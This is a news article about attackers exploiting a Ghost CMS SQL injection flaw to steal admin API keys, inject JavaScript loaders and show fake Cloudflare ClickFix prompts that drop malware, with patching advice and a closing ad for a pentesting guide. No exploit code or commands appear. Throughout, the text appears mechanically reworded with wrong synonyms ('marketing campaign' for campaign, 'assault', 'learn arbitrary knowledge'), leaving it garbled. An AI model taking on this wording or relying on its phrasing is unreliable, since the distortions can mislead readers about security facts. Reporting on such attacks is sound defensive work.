A big-scale marketing campaign is exploiting a essential SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix assault flows.
The marketing campaign used to be came upon by means of XLab danger intelligence researchers at Chinese language cybersecurity corporate Qianxin, who showed affect on greater than 700 domain names, together with college portals, AI/SaaS corporations, media retailers, fintech companies, safety websites, and private blogs.
In step with the researchers, danger actors planted malicious code on the internet sites of Harvard College, Oxford College, Auburn College, and DuckDuckGo.
Supply: XLab
CVE-2026-26980 affects Ghost 3.24.0 thru 6.19.0, and permits unauthenticated attackers to learn arbitrary knowledge from the web page database, together with the admin API keys.
This key provides control get right of entry to to customers, articles, and topics, and can be utilized to change article pages.
Even if the repair for the problem used to be launched on February 19 in Ghost CMS model 6.19.1, many websites failed to put in the protection replace.
SentinelOne printed on February 27 information about CVE-2026-26980 being exploited in assaults and the way incidents may also be detected. The researchers noticed no less than two distinct process clusters concentrated on susceptible Ghost websites, from time to time re-infecting the similar domain names with other scripts after cleanup, or one cleansing the script of the opposite to inject its personal.
Supply: XLab
Assault chain
The assaults that XLab noticed start by means of exploiting CVE-2026-26980 to thieve the admin API keys, after which use the increased rights to inject malicious JavaScript into articles.
The JavaScript code is a light-weight loader that fetches second-stage code from the attacker’s infrastructure, which is basically a cloaking script that fingerprints guests to resolve whether or not they qualify as goals.
Guests passing the verification are served a pretend Cloudflare suggested loaded by means of an iframe on best of the thing web page, which incorporates the ClickFix entice.
Supply: XLab
The web page instructs sufferers to ensure that they’re human by means of pasting a supplied command on their Home windows command suggested, which drops a payload on their methods.
XLab has noticed a couple of payloads being utilized in those assaults, together with DLL loaders, JavaScript droppers, and an Electron-based malware pattern named UtilifySetup.exe.
.jpg "Ghost CMS SQL injection flaw exploited in large-scale ClickFix marketing campaign")
Supply: XLab
Mitigating the danger
Crucial plan of action for Ghost CMS web page directors is to improve to model 6.19.1 or later and rotate all keys used prior to now, as they will were uncovered.
XLab supplied an inventory of signs of compromise (IoCs), together with injected scripts, so a radical evaluate of the internet sites is had to find and take away them.
The researchers suggest that web page homeowners deal with a 30-day file of admin API name logs to permit a competent retrospective investigation.
Computerized pentesting equipment ship actual price, however they have been constructed to respond to one query: can an attacker transfer throughout the community? They weren’t constructed to check whether or not your controls block threats, your detection laws fireplace, or your cloud configs hang.
This information covers the 6 surfaces you in fact wish to validate.
Obtain Now
